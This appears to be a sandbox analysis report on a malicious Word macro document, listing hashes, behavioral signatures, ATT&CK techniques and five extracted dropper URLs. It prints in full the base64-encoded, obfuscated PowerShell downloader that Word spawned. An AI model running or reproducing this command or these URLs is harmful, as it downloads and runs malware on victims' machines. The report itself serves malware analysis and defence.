a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe

General

Target

a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe.doc
Size

91KB
MD5

8ab1eb11519d5a556284d0e6d006b331
SHA1

c4689ad2bd4082c3986c747ac25bfd9296097673
SHA256

a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe
SHA512

4c37f58286da386d51f66cc0033456bf76833ed33f8fd57949f767456f49b50769431a7ba413b0cec3260beb3d6f14fa3b6b54214841a21cfd53faa102752ab9

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://oushyn.com/efV5qsN/

exe.dropper

http://valentico.ru/fvxr/

exe.dropper

http://algia.com.ar/L4E6sc/

exe.dropper

http://klusmeier.de/s0UdPE/

exe.dropper

http://zazz.com.br/UIrE4e/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3852	2732	PowersHeLL.exe	23

Blocklisted process makes network request 5 IoCs

flow	pid	Process
56	3852	PowersHeLL.exe
58	3852	PowersHeLL.exe
60	3852	PowersHeLL.exe
62	3852	PowersHeLL.exe
64	3852	PowersHeLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2732	WINWORD.EXE
2732	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3852	PowersHeLL.exe
3852	PowersHeLL.exe
3852	PowersHeLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3852	PowersHeLL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2732	WINWORD.EXE
2732	WINWORD.EXE
2732	WINWORD.EXE
2732	WINWORD.EXE
2732	WINWORD.EXE
2732	WINWORD.EXE
2732	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 2732 wrote to memory of 3852	2732	WINWORD.EXE	70
PID 2732 wrote to memory of 3852	2732	WINWORD.EXE	70

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2732
- C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exe
  PowersHeLL -e KAAgAG4AZQB3AC0ATwBCAEoARQBDAFQAIAAgAGkAbwAuAEMATwBtAFAAUgBFAHMAUwBpAE8ATgAuAGQARQBGAGwAQQB0AEUAcwB0AFIAZQBBAE0AKAAgAFsAcwB5AFMAVABFAE0ALgBpAG8ALgBtAEUATQBvAFIAeQBzAHQAUgBlAGEAbQBdACAAWwBDAE8ATgB2AGUAUgB0AF0AOgA6AEYAUgBPAE0AQgBBAFMARQA2ADQAUwB0AFIASQBOAGcAKAAgACcAVgBaAEIAdABUADgASQB3AEYARQBiAC8AUwBqADgAcwBHAFkAdgBTAFkAZwBRAE4ATgBDAFkAawBpAGcAWQBFAEoARQA0ADAARQBoAFAAVABkAFgAZQBzAHMAcgBYAFEARgBnAFkAagAvAEgAZQBMAHYAQwBSACsAYQBkAEsAZQA1ACsAVABlAHAAOQA1AGsAVQBKAFQAbQBGAGQAMABoAEMAVQBWAFYAUgBUAC8AQQBMAGQASgBNAHgAaQBxAG4AbgBoADYAVQB5AGUAUQAvAEMAagBmAEcAUQBvADYASABZAFAARQBIAFIAUABlAFoAQQBHAG0AcAAxADMAcwBwAFAAcgBVAEwAKwBxAG0AMQA4AHgAWQBoAGEAbQBuAFMAagBjAFIAYwA1AFEAUwBTADkAOABiAEMARABFAG4ANwBpAEYAWQBzAGMANAByAGcAQwB1AHMAbABTAFYAWgByAGYAUwBZAHMAbQB3AHEAMgBkAHoARABUAHAARgAvAHYAMwBCAGgAKwBaAHIATgBzAGEAWABJAFEAbwBIAEUATQB4AE4AVABHADgAYQBoAHoAWgBpAFUAcgB5AHoAOAB0ADAAbQBUAGMAMQBaADAANgBFAEIAKwBIADgAMAB6AFkAaQB0AC8AMgBBACsAcQB4AFkAbABMAGsAYgBqAHYAdgAwAEIAVgBMAFcATgB2AEsAMQBTAFYAcQBOAHEAOABiAHQAVgBzAFgAeQBCAGEAbQBwADAAZgA3AEIATQBoAFYAeQAvAFcAYgBvAHcAdgBrAGYALwBuAHUAUABNAHIAdQBpAG0ARQBOAFAAawAyAFUAQgBzAGIAVABpAHIAZAA0ADcAagA2AHAAUABoAEkAUwBIAGQAbwBIAFcANgBzADMAMgA4AE8AWAA0AFEAZABWAHkARQB5AHgAKwBGAEYAawBjAEkAcgBpAE4AeABWAGEATABlAFMAMABFAGwAeQBpADQAOABpAEEAaABwAFoAcABXAHgAMQBwAHgAYwBHAFkAMAB6AE8ATgAzAEoAQQBaADMAWABGAG0AZQBiAG8AdAB0AEwAQgBRAFQAWgBXAHgAeQBQAHYARwBuAFQAVwBIAHUAUgBWAEsANABvAEUAegAyAEIAVABvAGIAdgBjAEwAJwAgACkAIAAsACAAWwBJAG8ALgBDAE8AbQBQAHIAZQBTAFMAaQBPAE4ALgBDAE8AbQBQAFIARQBTAHMAaQBvAE4AbQBvAEQAZQBdADoAOgBEAEUAQwBPAG0AcABSAEUAUwBTACAAKQB8ACAARgBvAHIAZQBBAEMASAAtAG8AQgBqAGUAQwB0AHsAbgBlAHcALQBPAEIASgBFAEMAVAAgAHMAWQBzAHQARQBNAC4ASQBPAC4AcwB0AFIAZQBBAG0AcgBlAGEARABFAFIAKAAgACQAXwAsAFsAcwBZAHMAdABFAG0ALgB0AEUAeABUAC4ARQBuAGMAbwBEAGkAbgBnAF0AOgA6AGEAUwBjAEkASQAgACkAfQApAC4AcgBFAEEAZABUAG8AZQBOAEQAKAApACAAfAAgACYAIAAoACAAJABzAGgARQBsAGwAaQBkAFsAMQBdACsAJABzAGgARQBsAEwAaQBkAFsAMQAzAF0AKwAnAFgAJwApAA==
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3852

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2732-118-0x00007FFEE0A60000-0x00007FFEE0A70000-memory.dmp

Filesize
64KB

Download
memory/2732-119-0x00007FFEE0A60000-0x00007FFEE0A70000-memory.dmp

Filesize
64KB

Download
memory/2732-120-0x00007FFEE0A60000-0x00007FFEE0A70000-memory.dmp

Filesize
64KB

Download
memory/2732-121-0x00007FFEE0A60000-0x00007FFEE0A70000-memory.dmp

Filesize
64KB

Download
memory/2732-122-0x00007FFEE0A60000-0x00007FFEE0A70000-memory.dmp

Filesize
64KB

Download
memory/2732-123-0x000001B24EC60000-0x000001B24EC62000-memory.dmp

Filesize
8KB

Download
memory/2732-124-0x000001B24EC60000-0x000001B24EC62000-memory.dmp

Filesize
8KB

Download
memory/2732-125-0x000001B24EC60000-0x000001B24EC62000-memory.dmp

Filesize
8KB

Download
memory/3852-299-0x0000014655A60000-0x0000014655A62000-memory.dmp

Filesize
8KB

Download
memory/3852-300-0x0000014655A63000-0x0000014655A65000-memory.dmp

Filesize
8KB

Download
memory/3852-316-0x0000014655A66000-0x0000014655A68000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads